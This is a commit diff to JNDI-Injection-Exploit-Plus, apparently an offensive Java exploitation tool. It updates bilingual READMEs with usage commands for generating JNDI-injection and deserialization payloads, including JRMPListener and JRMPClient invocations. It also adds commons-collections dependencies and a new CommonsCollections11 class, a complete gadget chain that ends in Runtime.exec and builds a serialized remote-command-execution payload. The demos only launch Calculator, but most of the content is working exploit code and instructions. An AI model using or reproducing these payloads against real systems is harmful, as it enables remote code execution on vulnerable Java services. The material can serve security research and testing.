cckuailong
diff --git a/‎README.md‎
Lines changed: 19 additions & 10 deletions b/‎README.md‎
Lines changed: 19 additions & 10 deletions
diff --git a/‎README_zh.md‎
Lines changed: 9 additions & 9 deletions b/‎README_zh.md‎
Lines changed: 9 additions & 9 deletions
diff --git a/‎pom.xml‎
Lines changed: 26 additions & 0 deletions b/‎pom.xml‎
Lines changed: 26 additions & 0 deletions
diff --git a/‎src/main/java/payloads/CommonsCollections10.java‎
Lines changed: 0 additions & 2 deletions b/‎src/main/java/payloads/CommonsCollections10.java‎
Lines changed: 0 additions & 2 deletions
diff --git a/‎src/main/java/payloads/CommonsCollections11.java‎
Lines changed: 85 additions & 0 deletions b/‎src/main/java/payloads/CommonsCollections11.java‎
Lines changed: 85 additions & 0 deletions
@@ -35,7 +35,7 @@ Groovy (GroovyClassLoader) | @cckuailong | trustURLCodebase is false but have To
 Groovy (GroovyShell) | @cckuailong | trustURLCodebase is false but have Tomcat and Groovy in classpath
 Websphere Readfile | @cckuailong | trustURLCodebase is false but have WebSphere v6-v9 in classpath
 
-#### 3. Deserailization Gadget (total: 64)
+#### 3. Deserailization Gadget (total: 73)
 
 P.S. More Gadgets (:arrow_up: ) than ysoserial, welcome to PR more! ^_^
 
@@ -56,15 +56,24 @@ Coherence6 :arrow_up:           |@cckuailong                 |coherence:12.2.1.3
 CommonsBeanutils1   |@frohoff                    |commons-beanutils:1.9.2
 CommonsBeanutils2 :arrow_up:   |@cckuailong                 |commons-beanutils:1.9.2
 CommonsCollections1 |@frohoff                    |commons-collections:3.1
+CommonsCollections1_1 |@cckuailong                    |commons-collections:3.1
 CommonsCollections2 |@frohoff                    |commons-collections4:4.0
+CommonsCollections2_1 |@cckuailong                    |commons-collections4:4.0
 CommonsCollections3 |@frohoff                    |commons-collections:3.1
+CommonsCollections3_1 |@cckuailong                    |commons-collections:3.1
 CommonsCollections4 |@frohoff                    |commons-collections4:4.0
 CommonsCollections5 |@matthias_kaiser, @jasinner |commons-collections:3.1
+CommonsCollections5_1 |@cckuailong |commons-collections:3.1
 CommonsCollections6 |@matthias_kaiser            |commons-collections:3.1
+CommonsCollections6_1 |@cckuailong            |commons-collections:3.1
+CommonsCollections6_2 |@cckuailong            |commons-collections:3.1
+CommonsCollections6_3 |@cckuailong            |commons-collections:3.1
 CommonsCollections7 |@scristalli, @hanyrax, @EdoardoVignati |commons-collections:3.1
+CommonsCollections7_1 |@cckuailong |commons-collections:3.1
 CommonsCollections8 :arrow_up: |@cckuailong                 |commons-collections4:4.0
-CommonsCollections9 :arrow_up: |@cckuailong                 |commons-collections:3.1
+CommonsCollections9 :arrow_up: |@cckuailong                 |commons-collections:3.2.1
 CommonsCollections10 :arrow_up:|@cckuailong                 |commons-collections:3.2.1
+CommonsCollections11 :arrow_up:|@cckuailong                 |commons-collections:3.1
 FileUpload1         |@mbechler                   |commons-fileupload:1.3.1, commons-io:2.4 | file uploading
 Groovy1             |@frohoff                    |groovy:2.3.9
 Hibernate1          |@mbechler|
@@ -125,15 +134,15 @@ JbossRemoting | Jboss Remoting Port Unserialization
 - Example
 
 ```shell
-$ java -jar JNDI-Injection-Exploit-Plus-2.0-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -W Xstream
+$ java -jar JNDI-Injection-Exploit-Plus-2.1-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -W Xstream
 ```
 
 ![](./img/4.png)
 
 #### Web service to return Deserial Gadgets
 
 ```shell
-java -jar JNDI-Injection-Exploit-Plus-2.0-SNAPSHOT-all.jar
+java -jar JNDI-Injection-Exploit-Plus-2.1-SNAPSHOT-all.jar
 ```
 
 ```shell
@@ -153,7 +162,7 @@ P.S. Param wrapper & output is opetional
 Run as
 
 ```shell
-$ java -jar JNDI-Injection-Exploit-Plus-2.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]
+$ java -jar JNDI-Injection-Exploit-Plus-2.1-SNAPSHOT-all.jar [-C] [command] [-A] [address]
 ```
 
 where:
@@ -183,7 +192,7 @@ Points for attention:
 Run as
 
 ```shell
-$ java -jar JNDI-Injection-Exploit-Plus-2.0-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [base64/hex]
+$ java -jar JNDI-Injection-Exploit-Plus-2.1-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [base64/hex]
 ```
 
 where:
@@ -201,13 +210,13 @@ where:
 - JRMPListener
 
 ```shell
-java -cp JNDI-Injection-Exploit-Plus-2.0-SNAPSHOT-all.jar exploit.JRMPListener <port> CommonsCollections1 calc
+java -cp JNDI-Injection-Exploit-Plus-2.1-SNAPSHOT-all.jar exploit.JRMPListener <port> CommonsCollections1 calc
 ```
 
 - JRMPClient
 
 ```shell
-java -jar JNDI-Injection-Exploit-Plus-2.0-SNAPSHOT-all.jar -C "<ip>:<port>" -D "JRMPClient" -O base64
+java -jar JNDI-Injection-Exploit-Plus-2.1-SNAPSHOT-all.jar -C "<ip>:<port>" -D "JRMPClient" -O base64
 ```
 
 ## Examples
@@ -219,7 +228,7 @@ Local demo:
 1. Start the tool like this:
 
    ```shell
-   $ java -jar JNDI-Injection-Exploit-Plus-2.0-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"
+   $ java -jar JNDI-Injection-Exploit-Plus-2.1-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"
    ```
 
     Screenshot:
@@ -250,7 +259,7 @@ For More Examples: [Test-JNDI-Injection-Exploit-Plus](https://github.com/cckuail
 ### Deserialization Payloads
 
 ```shell
-$ java -jar JNDI-Injection-Exploit-Plus-2.0-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64
+$ java -jar JNDI-Injection-Exploit-Plus-2.1-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64
 ```
 
 Base64 Output Result:
 
@@ -12,14 +12,14 @@ JNDI-Injection-Exploit-Plus改写自welk1n大佬的JNDI-Injection-Exploit项目
 
 - 远程Reference链 （3种）
 - 本地Reference链 （4种）
-- 反序列化链（64种）
+- 反序列化链（73种）
 
 P.S. 具体利用链名称及依赖见 [表格](./README.md)
 
 #### 使用方法
 
 ```
-$ java -jar JNDI-Injection-Exploit-Plus-2.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]
+$ java -jar JNDI-Injection-Exploit-Plus-2.1-SNAPSHOT-all.jar [-C] [command] [-A] [address]
 ```
 
 #### 参数说明
@@ -39,7 +39,7 @@ $ java -jar JNDI-Injection-Exploit-Plus-2.0-SNAPSHOT-all.jar [-C] [command] [-A]
 1. 运行工具
 
 ```
-$ java -jar JNDI-Injection-Exploit-Plus-2.0-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"
+$ java -jar JNDI-Injection-Exploit-Plus-2.1-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"
 ```
 
 ![](./img/1.png)
@@ -64,7 +64,7 @@ class Test{
 #### 使用方法
 
 ```
-$ java -jar JNDI-Injection-Exploit-Plus-2.0-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [base64/hex]
+$ java -jar JNDI-Injection-Exploit-Plus-2.1-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [base64/hex]
 ```
 
 #### 参数说明
@@ -84,7 +84,7 @@ $ java -jar JNDI-Injection-Exploit-Plus-2.0-SNAPSHOT-all.jar [-C] [command] [-D]
 1. 普通
 
 ```
-$ java -jar JNDI-Injection-Exploit-Plus-2.0-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64
+$ java -jar JNDI-Injection-Exploit-Plus-2.1-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64
 ```
 
 ![](./img/3.png)
@@ -93,12 +93,12 @@ $ java -jar JNDI-Injection-Exploit-Plus-2.0-SNAPSHOT-all.jar -C "/System/Applica
 
 - JRMPListener
 ```
-java -cp JNDI-Injection-Exploit-Plus-2.0-SNAPSHOT-all.jar exploit.JRMPListener <port> CommonsCollections1 calc
+java -cp JNDI-Injection-Exploit-Plus-2.1-SNAPSHOT-all.jar exploit.JRMPListener <port> CommonsCollections1 calc
 ```
 
 - JRMPClient
 ```
-java -jar JNDI-Injection-Exploit-Plus-2.0-SNAPSHOT-all.jar -C "<ip>:<port>" -D "JRMPClient" -O base64
+java -jar JNDI-Injection-Exploit-Plus-2.1-SNAPSHOT-all.jar -C "<ip>:<port>" -D "JRMPClient" -O base64
 ```
 
 #### 提供反序列化包装器
@@ -112,15 +112,15 @@ JbossRemoting | Jboss Remoting 服务反序列化
 - 示例
 
 ```shell
-$ java -jar JNDI-Injection-Exploit-Plus-2.0-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -W Xstream
+$ java -jar JNDI-Injection-Exploit-Plus-2.1-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -W Xstream
 ```
 
 ![](./img/4.png)
 
 #### 可以返回反序列化数据的web服务
 
 ```shell
-java -jar JNDI-Injection-Exploit-Plus-2.0-SNAPSHOT-all.jar
+java -jar JNDI-Injection-Exploit-Plus-2.1-SNAPSHOT-all.jar
 ```
 
 ```shell
 
@@ -95,6 +95,17 @@
             <version>1.9</version>
         </dependency>
 
+<!--        <dependency>-->
+<!--            <groupId>org.glassfish.main.web</groupId>-->
+<!--            <artifactId>web-core</artifactId>-->
+<!--            <version>5.0.1</version>-->
+<!--        </dependency>-->
+<!--        <dependency>-->
+<!--            <groupId>org.glassfish.grizzly</groupId>-->
+<!--            <artifactId>grizzly-http-servlet-server</artifactId>-->
+<!--            <version>2.4.3</version>-->
+<!--        </dependency>-->
+
         <dependency>
             <groupId>org.apache.tomcat</groupId>
             <artifactId>tomcat-catalina</artifactId>
@@ -123,11 +134,24 @@
             <version>1.9.2</version>
         </dependency>
 
+        <dependency>
+            <groupId>commons-collections</groupId>
+            <artifactId>commons-collections</artifactId>
+            <version>3.1</version>
+        </dependency>
+
+        <dependency>
+            <groupId>commons-collections</groupId>
+            <artifactId>commons-collections</artifactId>
+            <version>3.2.1</version>
+        </dependency>
+
         <dependency>
             <groupId>org.apache.commons</groupId>
             <artifactId>commons-collections4</artifactId>
             <version>4.0</version>
         </dependency>
+
         <dependency>
             <groupId>org.aspectj</groupId>
             <artifactId>aspectjweaver</artifactId>
@@ -300,6 +324,7 @@
             <version>4.12</version>
             <scope>test</scope>
         </dependency>
+
     </dependencies>
 
 
@@ -478,6 +503,7 @@
                             <goal>install-file</goal>
                         </goals>
                     </execution>
+
                 </executions>
             </plugin>
         </plugins>
 
@@ -1,6 +1,5 @@
 package payloads;
 
-import org.apache.commons.collections.comparators.TransformingComparator;
 import org.apache.commons.collections.functors.InvokerTransformer;
 import org.apache.commons.collections.keyvalue.TiedMapEntry;
 import org.apache.commons.collections.map.LazyMap;
@@ -10,7 +9,6 @@
 import util.PayloadRunner;
 import util.Reflections;
 
-import javax.management.BadAttributeValueExpException;
 import java.lang.reflect.Field;
 import java.util.HashMap;
 import java.util.HashSet;
 
@@ -0,0 +1,85 @@
+package payloads;
+
+import org.apache.commons.collections.Transformer;
+import org.apache.commons.collections.functors.ChainedTransformer;
+import org.apache.commons.collections.functors.ConstantTransformer;
+import org.apache.commons.collections.functors.InvokerTransformer;
+import org.apache.commons.collections.keyvalue.TiedMapEntry;
+import org.apache.commons.collections.map.LazyMap;
+import payloads.annotation.Authors;
+import payloads.annotation.Dependencies;
+import util.PayloadRunner;
+import util.Reflections;
+
+import java.lang.reflect.Field;
+import java.util.HashMap;
+import java.util.Hashtable;
+import java.util.Map;
+
+/*
+Gadget chain:
+java.util.Hashtable.readObject
+    java.util.Hashtable.reconstitutionPut
+    org.apache.commons.collections.keyvalue.TiedMapEntry.hashCode()
+        org.apache.commons.collections.keyvalue.TiedMapEntry.getValue()
+            org.apache.commons.collections.map.LazyMap.get()
+                org.apache.commons.collections.functors.ChainedTransformer.transform()
+                org.apache.commons.collections.functors.InvokerTransformer.transform()
+                java.lang.reflect.Method.invoke()
+                    java.lang.Runtime.exec()
+*/
+@Dependencies({"commons-collections:commons-collections:3.1"})
+@Authors({Authors.CCKUAILONG})
+
+public class CommonsCollections11 extends PayloadRunner implements ObjectPayload<Hashtable> {
+
+    public Hashtable getObject(String command) throws Exception {
+        final String[] execArgs = new String[]{command};
+
+        final Transformer transformerChain = new ChainedTransformer(new Transformer[]{});
+
+        final Transformer[] transformers = new Transformer[]{
+                new ConstantTransformer(Runtime.class),
+                new InvokerTransformer("getMethod",
+                        new Class[]{String.class, Class[].class},
+                        new Object[]{"getRuntime", new Class[0]}),
+                new InvokerTransformer("invoke",
+                        new Class[]{Object.class, Object[].class},
+                        new Object[]{null, new Object[0]}),
+                new InvokerTransformer("exec",
+                        new Class[]{String.class},
+                        execArgs),
+                new ConstantTransformer(1)};
+
+        final Map innerMap = new HashMap();
+
+        final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
+
+        TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");
+        Hashtable hashtable = new Hashtable();
+        hashtable.put("foo",1);
+        // 获取hashtable的table类属性
+        Field tableField = Hashtable.class.getDeclaredField("table");
+        Reflections.setAccessible(tableField);
+        Object[] table = (Object[])tableField.get(hashtable);
+        Object entry1 = table[0];
+        if(entry1==null)
+            entry1 = table[1];
+        // 获取Hashtable.Entry的key属性
+        Field keyField = entry1.getClass().getDeclaredField("key");
+        Reflections.setAccessible(keyField);
+        // 将key属性给替换成构造好的TiedMapEntry实例
+        keyField.set(entry1, entry);
+        // 填充真正的命令执行代码
+        Reflections.setFieldValue(transformerChain, "iTransformers", transformers);
+        return hashtable;
+    }
+
+    public static byte[] getBytes(final String command) throws Exception {
+        return PayloadRunner.run(CommonsCollections11.class, command);
+    }
+
+    public static void main(final String command) throws Exception {
+        PayloadRunner.run(CommonsCollections11.class, command);
+    }
+}